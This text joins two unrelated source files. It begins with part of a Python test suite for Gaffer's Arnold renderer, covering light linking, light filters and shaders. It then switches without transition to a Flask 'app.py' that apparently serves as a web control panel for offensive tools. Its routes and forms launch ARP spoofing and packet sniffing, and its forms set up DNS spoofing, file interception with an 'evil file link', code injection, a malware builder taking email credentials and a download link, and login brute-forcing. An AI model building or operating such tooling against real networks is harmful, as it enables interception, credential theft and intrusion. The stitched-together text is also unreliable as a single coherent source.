attributes = GafferScene.StandardAttributes()
arnoldAttributes = GafferArnold.ArnoldAttributes()
light1 = GafferArnold.ArnoldLight()
light1.loadShader( "point_light" )
light2 = GafferArnold.ArnoldLight()
light2.loadShader( "point_light" )
group = GafferScene.Group()
render = GafferArnold.ArnoldRender()
attributes["in"].setInput( sphere1["out"] )
arnoldAttributes["in"].setInput( attributes["out"] )
group["in"][0].setInput( arnoldAttributes["out"] )
group["in"][1].setInput( light1["out"] )
group["in"][2].setInput( light2["out"] )
group["in"][3].setInput( sphere2["out"] )
render["in"].setInput( group["out"] )
# Illumination
attributes["attributes"]["linkedLights"]["enabled"].setValue( True )
attributes["attributes"]["linkedLights"]["value"].setValue( "/group/light" )
# Shadows
arnoldAttributes["attributes"]["shadowGroup"]["enabled"].setValue( True )
arnoldAttributes["attributes"]["shadowGroup"]["value"].setValue( "/group/light1" )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
# the first sphere had linked lights
sphere = arnold.AiNodeLookUpByName( universe, "/group/sphere" )
# check illumination
self.assertTrue( arnold.AiNodeGetBool( sphere, "use_light_group" ) )
lights = arnold.AiNodeGetArray( sphere, "light_group" )
self.assertEqual( arnold.AiArrayGetNumElements( lights ), 1 )
self.assertEqual(
arnold.AiNodeGetName( arnold.AiArrayGetPtr( lights, 0 ) ),
"light:/group/light"
)
# check shadows
self.assertTrue( arnold.AiNodeGetBool( sphere, "use_shadow_group" ) )
shadows = arnold.AiNodeGetArray( sphere, "shadow_group" )
self.assertEqual( arnold.AiArrayGetNumElements( shadows ), 1 )
self.assertEqual(
arnold.AiNodeGetName( arnold.AiArrayGetPtr( shadows, 0 ) ),
"light:/group/light1"
)
# the second sphere does not have any light linking enabled
sphere1 = arnold.AiNodeLookUpByName( universe, "/group/sphere1" )
# check illumination
self.assertFalse( arnold.AiNodeGetBool( sphere1, "use_light_group" ) )
lights = arnold.AiNodeGetArray( sphere1, "light_group" )
self.assertEqual( arnold.AiArrayGetNumElements( lights ), 0 )
# check shadows
self.assertFalse( arnold.AiNodeGetBool( sphere1, "use_shadow_group" ) )
shadows = arnold.AiNodeGetArray( sphere1, "shadow_group" )
self.assertEqual( arnold.AiArrayGetNumElements( shadows ), 0 )
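# Geometry converted to a mesh light should not itself receive light_group linking, even when light linking is active elsewhere in the scene.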
def testNoLinkedLightsOnLights( self ) :
sphere = GafferScene.Sphere()
meshLightShader = GafferArnold.ArnoldShader()
meshLightShader.loadShader( "flat" )
meshLightFilter = GafferScene.PathFilter()
meshLightFilter["paths"].setValue( IECore.StringVectorData( [ "/sphere" ] ) )
meshLight = GafferArnold.ArnoldMeshLight()
meshLight["in"].setInput( sphere["out"] )
meshLight["filter"].setInput( meshLightFilter["out"] )
meshLight["parameters"]["color"].setInput( meshLightShader["out"] )
light1 = GafferArnold.ArnoldLight()
light1.loadShader( "point_light" )
light2 = GafferArnold.ArnoldLight()
light2.loadShader( "point_light" )
# Trigger light linking by unlinking a light
light2["defaultLight"].setValue( False )
group = GafferScene.Group()
group["in"][0].setInput( meshLight["out"] )
group["in"][1].setInput( light1["out"] )
group["in"][2].setInput( light2["out"] )
render = GafferArnold.ArnoldRender()
render["in"].setInput( group["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
sphere = arnold.AiNodeLookUpByName( universe, "/group/sphere" )
self.assertIsNotNone( sphere )
self.assertEqual( arnold.AiArrayGetNumElements( arnold.AiNodeGetArray( sphere, "light_group" ) ), 0 )
self.assertFalse( arnold.AiNodeGetBool( sphere, "use_light_group" ) )
def testLightFilters( self ) :
s = Gaffer.ScriptNode()
s["lightFilter"] = GafferArnold.ArnoldLightFilter()
s["lightFilter"].loadShader( "light_blocker" )
s["attributes"] = GafferScene.StandardAttributes()
s["attributes"]["in"].setInput( s["lightFilter"]["out"] )
s["attributes"]["attributes"]["filteredLights"]["enabled"].setValue( True )
s["attributes"]["attributes"]["filteredLights"]["value"].setValue( "defaultLights" )
s["light"] = GafferArnold.ArnoldLight()
s["light"].loadShader( "point_light" )
s["gobo"] = GafferArnold.ArnoldShader()
s["gobo"].loadShader( "gobo" )
s["assignment"] = GafferScene.ShaderAssignment()
s["assignment"]["in"].setInput( s["light"]["out"] )
s["assignment"]["shader"].setInput( s["gobo"]["out"] )
s["group"] = GafferScene.Group()
s["group"]["in"][0].setInput( s["attributes"]["out"] )
s["group"]["in"][1].setInput( s["assignment"]["out"] )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["group"]["out"] )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
light = arnold.AiNodeLookUpByName( universe, "light:/group/light" )
linkedFilters = arnold.AiNodeGetArray( light, "filters" )
numFilters = arnold.AiArrayGetNumElements( linkedFilters.contents )
self.assertEqual( numFilters, 2 )
linkedFilter = arnold.cast(arnold.AiArrayGetPtr(linkedFilters, 0), arnold.POINTER(arnold.AtNode))
linkedGobo = arnold.cast(arnold.AiArrayGetPtr(linkedFilters, 1), arnold.POINTER(arnold.AtNode))
self.assertEqual( arnold.AiNodeGetName( linkedFilter ), "lightFilter:/group/lightFilter" )
self.assertEqual( arnold.AiNodeEntryGetName( arnold.AiNodeGetNodeEntry( linkedFilter ) ), "light_blocker" )
self.assertEqual( arnold.AiNodeEntryGetName( arnold.AiNodeGetNodeEntry( linkedGobo ) ), "gobo" )
@GafferTest.TestRunner.PerformanceTestMethod( repeat = 1 )
def testLightFiltersMany( self ) :
numLights = 10000
numLightFilters = 10000
s = Gaffer.ScriptNode()
s["lightFilter"] = GafferArnold.ArnoldLightFilter()
s["lightFilter"].loadShader( "light_blocker" )
s["lightFilter"]["filteredLights"].setValue( "defaultLights" )
s["planeFilters"] = GafferScene.Plane( "Plane" )
s["planeFilters"]["divisions"].setValue( imath.V2i( 1, numLightFilters / 2 - 1 ) )
s["instancerFilters"] = GafferScene.Instancer( "Instancer" )
s["instancerFilters"]["in"].setInput( s["planeFilters"]["out"] )
s["instancerFilters"]["instances"].setInput( s["lightFilter"]["out"] )
s["instancerFilters"]["parent"].setValue( "/plane" )
s["light"] = GafferArnold.ArnoldLight()
s["light"].loadShader( "point_light" )
s["planeLights"] = GafferScene.Plane( "Plane" )
s["planeLights"]["divisions"].setValue( imath.V2i( 1, numLights / 2 - 1 ) )
s["instancerLights"] = GafferScene.Instancer( "Instancer" )
s["instancerLights"]["in"].setInput( s["planeLights"]["out"] )
s["instancerLights"]["instances"].setInput( s["light"]["out"] )
s["instancerLights"]["parent"].setValue( "/plane" )
s["group"] = GafferScene.Group( "Group" )
s["group"]["in"][0].setInput( s["instancerFilters"]["out"] )
s["group"]["in"][1].setInput( s["instancerLights"]["out"] )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["group"]["out"] )
with Gaffer.Context() as c :
c["scene:render:sceneTranslationOnly"] = IECore.BoolData( True )
s["render"]["task"].execute()
def testAbortRaises( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["plane"]["transform"]["translate"]["z"].setValue( -10 )
s["shader"] = GafferArnold.ArnoldShader()
s["shader"].loadShader( "image" )
# Missing texture should cause render to abort
s["shader"]["parameters"]["filename"].setValue( "iDontExist" )
s["filter"] = GafferScene.PathFilter()
s["filter"]["paths"].setValue( IECore.StringVectorData( [ "/plane" ] ) )
s["shaderAssignment"] = GafferScene.ShaderAssignment()
s["shaderAssignment"]["in"].setInput( s["plane"]["out"] )
s["shaderAssignment"]["filter"].setInput( s["filter"]["out"] )
s["shaderAssignment"]["shader"].setInput( s["shader"]["out"] )
s["outputs"] = GafferScene.Outputs()
s["outputs"].addOutput(
"beauty",
IECoreScene.Output(
self.temporaryDirectory() + "/test.tif",
"tiff",
"rgba",
{}
)
)
s["outputs"]["in"].setInput( s["shaderAssignment"]["out"] )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["outputs"]["out"] )
six.assertRaisesRegex( self, RuntimeError, "Render aborted", s["render"]["task"].execute )
def testOSLShaders( self ) :
purple = GafferOSL.OSLShader()
purple.loadShader( "Maths/MixColor" )
purple["parameters"]["a"].setValue( imath.Color3f( 0.5, 0, 1 ) )
green = GafferOSL.OSLShader()
green.loadShader( "Maths/MixColor" )
green["parameters"]["a"].setValue( imath.Color3f( 0, 1, 0 ) )
mix = GafferOSL.OSLShader()
mix.loadShader( "Maths/MixColor" )
# test component connections
mix["parameters"]["a"][2].setInput( purple["out"]["out"][2] )
# test color connections
mix["parameters"]["b"].setInput( green["out"]["out"] )
mix["parameters"]["m"].setValue( 0.5 )
ball = GafferArnold.ArnoldShaderBall()
ball["shader"].setInput( mix["out"] )
catalogue = GafferImage.Catalogue()
outputs = GafferScene.Outputs()
outputs.addOutput(
"beauty",
IECoreScene.Output(
"test",
"ieDisplay",
"rgba",
{
"driverType" : "ClientDisplayDriver",
"displayHost" : "localhost",
"displayPort" : str( catalogue.displayDriverServer().portNumber() ),
"remoteDisplayType" : "GafferImage::GafferDisplayDriver",
}
)
)
outputs["in"].setInput( ball["out"] )
render = GafferArnold.ArnoldRender()
render["in"].setInput( outputs["out"] )
with GafferTest.ParallelAlgoTest.UIThreadCallHandler() as handler :
render["task"].execute()
handler.waitFor( 0.1 ) #Just need to let the catalogue update
self.assertEqual( self.__color4fAtUV( catalogue, imath.V2f( 0.5 ) ), imath.Color4f( 0, 0.5, 0.5, 1 ) )
def testDefaultLightsMistakesDontForceLinking( self ) :
light = GafferArnold.ArnoldLight()
light.loadShader( "point_light" )
sphere = GafferScene.Sphere()
# It doesn't make sense to add a non-light to the "defaultLights"
# set like this, but in the event of user error, we don't want to
# emit light links unnecessarily.
sphereSet = GafferScene.Set()
sphereSet["in"].setInput( sphere["out"] )
sphereSet["name"].setValue( "defaultLights" )
sphereSet["paths"].setValue( IECore.StringVectorData( [ "/sphere" ] ) )
group = GafferScene.Group()
group["in"][0].setInput( light["out"] )
group["in"][1].setInput( sphereSet["out"] )
render = GafferArnold.ArnoldRender()
render["in"].setInput( group["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
sphere = arnold.AiNodeLookUpByName( universe, "/group/sphere" )
self.assertIsNotNone( sphere )
self.assertEqual( arnold.AiArrayGetNumElements( arnold.AiNodeGetArray( sphere, "light_group" ) ), 0 )
self.assertFalse( arnold.AiNodeGetBool( sphere, "use_light_group" ) )
def testLightLinkingWarnings( self ) :
# Emulate a meshlight that has been set up sloppily - it is filtered to 4 locations, some actually
# have meshes, some don't
lightSphere = GafferScene.Sphere()
lightInvalid = GafferScene.Group()
lightGroup = GafferScene.Group()
lightGroup["name"].setValue( "lightGroup" )
lightGroup["in"][0].setInput( lightSphere["out"] ) # Has a mesh
lightGroup["in"][1].setInput( lightSphere["out"] ) # Has a mesh
lightGroup["in"][2].setInput( lightInvalid["out"] ) # Doesn't have a mesh
lightGroup["in"][3].setInput( lightInvalid["out"] ) # Doesn't have a mesh
meshLightFilter = GafferScene.PathFilter()
meshLightFilter["paths"].setValue( IECore.StringVectorData( [ "/lightGroup/*" ] ) )
meshLight = GafferArnold.ArnoldMeshLight()
meshLight["in"].setInput( lightGroup["out"] )
meshLight["filter"].setInput( meshLightFilter["out"] )
geoSphere = GafferScene.Sphere()
geoGroup = GafferScene.Group()
geoGroup["name"].setValue( "geoGroup" )
for i in range( 20 ):
geoGroup["in"][i].setInput( geoSphere["out"] )
group = GafferScene.Group()
group["in"][0].setInput( geoGroup["out"] )
group["in"][1].setInput( meshLight["out"] )
attributeFilter = GafferScene.PathFilter()
attributeFilter["paths"].setValue( IECore.StringVectorData( [ "/group/geoGroup/*" ] ) )
attributes = GafferScene.StandardAttributes()
attributes["in"].setInput( group["out"] )
attributes["filter"].setInput( attributeFilter["out"] )
attributes["attributes"]["linkedLights"]["enabled"].setValue( True )
# Link some ( but not all ) lights, so we have to do actual light linking
attributes["attributes"]["linkedLights"]["value"].setValue(
"/group/lightGroup/sphere1 /group/lightGroup/group /group/lightGroup/group1"
)
render = GafferArnold.ArnoldRender()
render["in"].setInput( attributes["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
# Don't really understand why a regular `with CapturingMessageHandler` doesn't work here
try :
defaultHandler = IECore.MessageHandler.getDefaultHandler()
mh = IECore.CapturingMessageHandler()
IECore.MessageHandler.setDefaultHandler( mh )
render["task"].execute()
finally :
IECore.MessageHandler.setDefaultHandler( defaultHandler )
# We want to see one message per invalid light - not repeated for each location it's referenced at
self.assertEqual( len( mh.messages ), 2 )
mm = [ m.message for m in mh.messages ]
self.assertTrue( "Mesh light without object at location: /group/lightGroup/group" in mm )
self.assertTrue( "Mesh light without object at location: /group/lightGroup/group1" in mm )
def __color4fAtUV( self, image, uv ) :
sampler = GafferImage.ImageSampler()
sampler["image"].setInput( image["out"] )
dw = image['out']["format"].getValue().getDisplayWindow().size()
sampler["pixel"].setValue( uv * imath.V2f( dw.x, dw.y ) )
return sampler["color"].getValue()
def __arrayToSet( self, a ) :
result = set()
for i in range( 0, arnold.AiArrayGetNumElements( a.contents ) ) :
if arnold.AiArrayGetType( a.contents ) == arnold.AI_TYPE_STRING :
result.add( arnold.AiArrayGetStr( a, i ) )
else :
raise TypeError
return result
def testPerformanceMonitorDoesntCrash( self ) :
options = GafferScene.StandardOptions()
options["options"]["performanceMonitor"]["value"].setValue( True )
options["options"]["performanceMonitor"]["enabled"].setValue( True )
render = GafferArnold.ArnoldRender()
render["in"].setInput( options["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
def testShaderSubstitutions( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["planeAttrs"] = GafferScene.CustomAttributes()
s["planeAttrs"]["in"].setInput( s["plane"]["out"] )
s["planeAttrs"]["attributes"].addChild( Gaffer.NameValuePlug( "A", Gaffer.StringPlug( "value", defaultValue = 'bar' ) ) )
s["planeAttrs"]["attributes"].addChild( Gaffer.NameValuePlug( "B", Gaffer.StringPlug( "value", defaultValue = 'foo' ) ) )
s["cube"] = GafferScene.Cube()
s["cubeAttrs"] = GafferScene.CustomAttributes()
s["cubeAttrs"]["in"].setInput( s["cube"]["out"] )
s["cubeAttrs"]["attributes"].addChild( Gaffer.NameValuePlug( "B", Gaffer.StringPlug( "value", defaultValue = 'override' ) ) )
s["parent"] = GafferScene.Parent()
s["parent"]["in"].setInput( s["planeAttrs"]["out"] )
s["parent"]["children"][0].setInput( s["cubeAttrs"]["out"] )
s["parent"]["parent"].setValue( "/plane" )
s["shader"] = GafferArnold.ArnoldShader()
s["shader"].loadShader( "image" )
s["shader"]["parameters"]["filename"].setValue( "<attr:A>/path/<attr:B>.tx" )
s["filter"] = GafferScene.PathFilter()
s["filter"]["paths"].setValue( IECore.StringVectorData( [ "/plane" ] ) )
s["shaderAssignment"] = GafferScene.ShaderAssignment()
s["shaderAssignment"]["in"].setInput( s["parent"]["out"] )
s["shaderAssignment"]["filter"].setInput( s["filter"]["out"] )
s["shaderAssignment"]["shader"].setInput( s["shader"]["out"] )
s["light"] = GafferArnold.ArnoldLight()
s["light"].loadShader( "photometric_light" )
s["light"]["parameters"]["filename"].setValue( "/path/<attr:A>.ies" )
s["goboTexture"] = GafferArnold.ArnoldShader()
s["goboTexture"].loadShader( "image" )
s["goboTexture"]["parameters"]["filename"].setValue( "<attr:B>/gobo.tx" )
s["gobo"] = GafferArnold.ArnoldShader()
s["gobo"].loadShader( "gobo" )
s["gobo"]["parameters"]["slidemap"].setInput( s["goboTexture"]["out"] )
s["goboAssign"] = GafferScene.ShaderAssignment()
s["goboAssign"]["in"].setInput( s["light"]["out"] )
s["goboAssign"]["shader"].setInput( s["gobo"]["out"] )
s["lightBlocker"] = GafferArnold.ArnoldLightFilter()
s["lightBlocker"].loadShader( "light_blocker" )
s["lightBlocker"]["parameters"]["geometry_type"].setValue( "<attr:geometryType>" )
s["lightGroup"] = GafferScene.Group()
s["lightGroup"]["name"].setValue( "lightGroup" )
s["lightGroup"]["in"][0].setInput( s["goboAssign"]["out"] )
s["lightGroup"]["in"][1].setInput( s["lightBlocker"]["out"] )
s["parent2"] = GafferScene.Parent()
s["parent2"]["in"].setInput( s["shaderAssignment"]["out"] )
s["parent2"]["children"][0].setInput( s["lightGroup"]["out"] )
s["parent2"]["parent"].setValue( "/" )
s["globalAttrs"] = GafferScene.CustomAttributes()
s["globalAttrs"]["in"].setInput( s["parent2"]["out"] )
s["globalAttrs"]["global"].setValue( True )
s["globalAttrs"]["attributes"].addChild( Gaffer.NameValuePlug( "A", Gaffer.StringPlug( "value", defaultValue = 'default1' ) ) )
s["globalAttrs"]["attributes"].addChild( Gaffer.NameValuePlug( "B", Gaffer.StringPlug( "value", defaultValue = 'default2' ) ) )
s["globalAttrs"]["attributes"].addChild( Gaffer.NameValuePlug( "geometryType", Gaffer.StringPlug( "value", defaultValue = 'cylinder' ) ) )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["globalAttrs"]["out"] )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
plane = arnold.AiNodeLookUpByName( universe, "/plane" )
shader = arnold.AiNodeGetPtr( plane, "shader" )
self.assertEqual( arnold.AiNodeGetStr( shader, "filename" ), "bar/path/foo.tx" )
cube = arnold.AiNodeLookUpByName( universe, "/plane/cube" )
shader2 = arnold.AiNodeGetPtr( cube, "shader" )
self.assertEqual( arnold.AiNodeGetStr( shader2, "filename" ), "bar/path/override.tx" )
light = arnold.AiNodeLookUpByName( universe, "light:/lightGroup/light" )
self.assertEqual( arnold.AiNodeGetStr( light, "filename" ), "/path/default1.ies" )
gobo = arnold.AiNodeGetPtr( light, "filters" )
goboTex = arnold.AiNodeGetLink( gobo, "slidemap" )
self.assertEqual( arnold.AiNodeGetStr( goboTex, "filename" ), "default2/gobo.tx" )
lightFilter = arnold.AiNodeLookUpByName( universe, "lightFilter:/lightGroup/lightFilter" )
self.assertEqual( arnold.AiNodeGetStr( lightFilter, "geometry_type" ), "cylinder" )
def testEncapsulateDeformationBlur( self ) :
s = Gaffer.ScriptNode()
# Make a sphere where the red channel has the value of the current frame.
s["sphere"] = GafferScene.Sphere()
s["sphereFilter"] = GafferScene.PathFilter()
s["sphereFilter"]["paths"].setValue( IECore.StringVectorData( [ "/sphere" ] ) )
s["frame"] = GafferTest.FrameNode()
s["flat"] = GafferArnold.ArnoldShader()
s["flat"].loadShader( "flat" )
s["flat"]["parameters"]["color"].setValue( imath.Color3f( 0 ) )
s["flat"]["parameters"]["color"]["r"].setInput( s["frame"]["output"] )
s["assignment"] = GafferScene.ShaderAssignment()
s["assignment"]["in"].setInput( s["sphere"]["out"] )
s["assignment"]["shader"].setInput( s["flat"]["out"] )
s["assignment"]["filter"].setInput( s["sphereFilter"]["out"] )
# Put the sphere in a capsule.
s["group"] = GafferScene.Group()
s["group"]["in"][0].setInput( s["assignment"]["out"] )
s["groupFilter"] = GafferScene.PathFilter()
s["groupFilter"]["paths"].setValue( IECore.StringVectorData( [ "/group" ] ) )
s["encapsulate"] = GafferScene.Encapsulate()
s["encapsulate"]["in"].setInput( s["group"]["out"] )
s["encapsulate"]["filter"].setInput( s["groupFilter"]["out"] )
# Do a render at frame 1, with deformation blur off.
s["outputs"] = GafferScene.Outputs()
s["outputs"].addOutput(
"beauty",
IECoreScene.Output(
os.path.join( self.temporaryDirectory(), "deformationBlurOff.exr" ),
"exr",
"rgba",
{
}
)
)
s["outputs"]["in"].setInput( s["encapsulate"]["out"] )
s["options"] = GafferScene.StandardOptions()
s["options"]["in"].setInput( s["outputs"]["out"] )
s["arnoldOptions"] = GafferArnold.ArnoldOptions()
s["arnoldOptions"]["in"].setInput( s["options"]["out"] )
s["arnoldOptions"]["options"]["aaSamples"]["enabled"].setValue( True )
s["arnoldOptions"]["options"]["aaSamples"]["value"].setValue( 6 )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["arnoldOptions"]["out"] )
s["render"]["task"].execute()
# Do another render at frame 1, but with deformation blur on.
s["options"]["options"]["deformationBlur"]["enabled"].setValue( True )
s["options"]["options"]["deformationBlur"]["value"].setValue( True )
s["options"]["options"]["shutter"]["enabled"].setValue( True )
s["options"]["options"]["shutter"]["value"].setValue( imath.V2f( -0.5, 0.5 ) )
s["outputs"]["outputs"][0]["fileName"].setValue( os.path.join( self.temporaryDirectory(), "deformationBlurOn.exr" ) )
s["render"]["task"].execute()
# Check that the renders are the same.
s["deformationOff"] = GafferImage.ImageReader()
s["deformationOff"]["fileName"].setValue( os.path.join( self.temporaryDirectory(), "deformationBlurOff.exr" ) )
s["deformationOn"] = GafferImage.ImageReader()
s["deformationOn"]["fileName"].setValue( os.path.join( self.temporaryDirectory(), "deformationBlurOn.exr" ) )
# The `maxDifference` is huge to account for noise and watermarks, but is still low enough to check what
# we want, since if the Encapsulate was sampled at shutter open and not the frame, the difference would be
# 0.5.
self.assertImagesEqual( s["deformationOff"]["out"], s["deformationOn"]["out"], maxDifference = 0.27, ignoreMetadata = True )
def testCoordinateSystem( self ) :
coordinateSystem = GafferScene.CoordinateSystem()
render = GafferArnold.ArnoldRender()
render["in"].setInput( coordinateSystem["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( os.path.join( self.temporaryDirectory(), "test.ass" ) )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, render["fileName"].getValue() )
# Arnold doesn't support coordinate systems, so we don't expect a
# node to have been created for ours.
self.assertIsNone( arnold.AiNodeLookUpByName( universe, "/coordinateSystem" ) )
if __name__ == "__main__":
unittest.main()
|
app.py
|
from flask import Flask, render_template, flash, redirect, url_for, session, logging, request, jsonify
from wtforms import Form, StringField, PasswordField, validators, ValidationError
from passlib.hash import sha256_crypt
from flask_sqlalchemy import SQLAlchemy
from datetime import datetime
from werkzeug.security import generate_password_hash, check_password_hash
from hack import change_mac, current_mac, scan, ArpSpoofTask, PacketSniffer, DnsSpoof, Interceptor, brute_force_attack
from code_injector import Injector
from malware import *
from threading import Thread
from crawler import *
import time
from scanner import *
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://root:@localhost/universell'
db = SQLAlchemy(app)
arp_spoof_attack = ArpSpoofTask()
packet_sniffer = PacketSniffer()
dns_spoof_attack = DnsSpoof()
interceptor = Interceptor()
injector = Injector()
crawler = None
scanner = None
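# User account model; passwords are stored as werkzeug generate_password_hash() digests (see register()).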
class Users(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(30), unique=False)
email = db.Column(db.String(50), unique=True)
password = db.Column(db.String(255))
created_at = db.Column(db.DateTime, nullable=False, default=datetime.utcnow)
class RegisterForm(Form):
name = StringField('Name', validators=[validators.DataRequired(), validators.Length(min=4,
max=30)])
email = StringField('Email', validators=[validators.DataRequired(), validators.Email()])
password = PasswordField('Password', validators=[validators.DataRequired()])
password_confirm = PasswordField('Confirm password', validators=[validators.DataRequired(), validators.EqualTo('password', message="Passwords don't match")])
def validate_email(self, email):
user = Users.query.filter_by(email=email.data).first()
if user:
raise ValidationError('Email Already Taken')
class MainScreen(Form):
target_url= StringField('Target URL', validators=[validators.DataRequired()])
class MacChanger(Form):
interface = StringField('Interface Name', validators=[validators.DataRequired()])
mac = StringField('MAC', validators=[validators.DataRequired(), validators.Regexp(r'\w\w:\w\w:\w\w:\w\w:\w\w:\w\w', message="Invalid MAC")])
class LoginForm(Form):
email = StringField('Email', validators=[validators.DataRequired(), validators.Email()])
password = PasswordField('Password', validators=[validators.DataRequired()])
class NetworkScanForm(Form):
ip = StringField('IP Or IP Range', validators=[validators.DataRequired()])
class ArpSpoofingForm(Form):
target_ip = StringField('Target IP', validators=[validators.DataRequired(), validators.Regexp(r'^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$', message="Invalid IP Format")])
spoof_ip = StringField('Spoof IP', validators=[validators.DataRequired(), validators.Regexp(r'^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$', message="Invalid IP Format")])
class PacketSniffingForm(Form):
interface = StringField('Interface', validators=[validators.DataRequired()])
class DnsSpoofingForm(Form):
target_url= StringField('Target URL', validators=[validators.DataRequired()])
spoof_ip = StringField('Spoof IP', validators=[validators.DataRequired(), validators.Regexp(r'^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$', message="Invalid IP Format")])
class FileInterceptorForm(Form):
evil_link = StringField('Evil File Link', validators=[validators.DataRequired()])
class CodeInjectorForm(Form):
code = StringField('Code To Inject', validators=[validators.DataRequired()])
class MalwareForm(Form):
email = StringField('Email', validators=[validators.DataRequired(), validators.Email()])
password = PasswordField('Password', validators=[validators.DataRequired()])
download_link = StringField('Download Link', validators=[validators.DataRequired()])
class CrawlerForm(Form):
url = StringField('URL', validators=[validators.DataRequired()])
class DictionaryForm(Form):
url = StringField('Target URL', validators=[validators.DataRequired()])
username_field = StringField('Username Field Name', validators=[validators.DataRequired()])
pass_field = StringField('Password Field Name', validators=[validators.DataRequired()])
username_guess = StringField('Username Guess', validators=[validators.DataRequired()])
submit_field = StringField('Submit Field Name', validators=[validators.DataRequired()])
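# Public pages (index/about/blog/login/register) are open to everyone; every tool route below checks session['logged_in'] before doing anything.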
@app.route("/")
def index():
return render_template("index.html")
@app.route("/about")
def about():
return render_template("about.html")
@app.route("/blog")
def blog():
return render_template("blog.html")
@app.route("/main", methods=['GET', 'POST'])
def main():
if not session.get('logged_in'):
flash("Unauthorized Access", "danger")
return redirect(url_for("login"))
else:
global scanner
form = MainScreen(request.form)
def scan_vuln():
global scanner  # without this declaration the assignment below only binds a local name, and /scan_array never sees it
scanner = 'abc'  # placeholder marker; the scanner module's result object is not exposed here
work(form.target_url.data)
if request.method == "POST" and form.validate():
t = Thread(target = scan_vuln)
t.start()
flash("Scanning...", 'success')
return render_template("main_screen.html", form = form, results = ['Check console for results'])
return render_template("main_screen.html", form = form)
@app.route("/mac", methods=['GET', 'POST'])
def mac():
if not session.get('logged_in'):
flash("Unauthorized Access", "danger")
return redirect(url_for("login"))
else:
form = MacChanger(request.form)
if request.method == "POST" and form.validate():
results = change_mac(form.interface.data, form.mac.data)
if(results):
msg = "MAC Address Changed Successfully"
return render_template("mac_changer.html", form=form, msg = msg, results = results)
else:
error = "Operation Was Not Successful"
return render_template("mac_changer.html", form=form, error = error)
return redirect(url_for("mac"))
return render_template("mac_changer.html", form=form)
@app.route("/network", methods=['GET', 'POST'])
def network():
if not session.get('logged_in'):
flash("Unauthorized Access", "danger")
return redirect(url_for("login"))
else:
form = NetworkScanForm(request.form)
if request.method == "POST" and form.validate():
results = scan(form.ip.data)
if(results):
msg = "Scanned Successfully"
return render_template("network_scanning.html", form=form, msg=msg, results=results)
else:
error = "No Results Found"
return render_template("network_scanning.html", form=form, error= error)
return render_template("network_scanning.html", form=form)
@app.route("/arp", methods=['GET', 'POST'])
def arp_spoof():
if not session.get('logged_in'):
flash("Unauthorized Access", "danger")
return redirect(url_for("login"))
else:
form = ArpSpoofingForm(request.form)
if request.method == "POST" and form.validate():
if 'restore' in request.form:
msg = "Restore Was Successful"
results = arp_spoof_attack.restore(form.target_ip.data, form.spoof_ip.data)
else:
msg = "ARP Spoofing Was Successful"
results = arp_spoof_attack.launch_arp_spoof(form.target_ip.data, form.spoof_ip.data)
if(results):
arp_spoof_attack.continue_arp_spoof(form.target_ip.data, form.spoof_ip.data)
return render_template("arp_spoof.html", form=form, msg = msg, results = results)
else:
error = "Operation Was Not Successful"
return render_template("arp_spoof.html", form=form, error = error)
return 'Success'
return render_template("arp_spoof.html", form=form)
@app.route("/sniff", methods=['GET', 'POST'])
def packet_sniff():
if not session.get('logged_in'):
flash("Unauthorized Access", "danger")
return redirect(url_for("login"))
else:
form = PacketSniffingForm(request.form)
if request.method == "POST" and form.validate():
if packet_sniffer.continue_packet_sniff(form.interface.data) == "running":
flash("Sniffer Already Running...", "danger")
else:
flash("Packet Sniffing Started Successfully", "success")
return redirect(url_for("packet_sniff"))
return render_template("packet_sniffing.html", form=form)
@app.route('/sniff_array', methods=['GET', 'POST'])
def sniff_array():
results = packet_sniffer.results
return jsonify(results=results)
